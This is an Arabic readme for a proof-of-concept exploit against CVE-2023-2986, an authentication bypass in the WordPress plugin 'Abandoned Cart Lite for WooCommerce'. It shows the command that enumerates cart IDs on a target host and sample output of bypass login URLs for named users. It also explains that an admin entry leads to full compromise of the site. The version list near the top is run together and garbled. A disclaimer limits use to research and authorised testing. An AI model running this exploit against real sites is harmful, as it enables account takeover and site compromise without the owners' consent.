
إثبات المفهوم للثغرة CVE-2023-2986 في إضافة 'Abandoned Cart Lite for WooCommerce' في ووردبريس
إثبات المفهوم للثغرة CVE-2023-2986 في إضافة 'Abandoned Cart Lite for WooCommerce' في ووردبريس
version <= 5.14.2version <= 5.15.15.15.05.15.25.15.2sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
إدخال الرابط في المتصفح سيمنحك الوصول إلى حساب المستخدم المعني. إذا كان مستخدم المشرف في ووردبريس نفسه لديه إدخال، فسيؤدي ذلك إلى الوصول إلى لوحة تحكم المشرف مما يؤدي إلى اختراق كامل لخادم ووردبريس.
تم إنشاء هذا الإثبات التجريبي (POC) لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. المؤلف غير مسؤول عن أي إساءة استخدام لهذا الإثبات التجريبي. استخدمه بمسؤولية.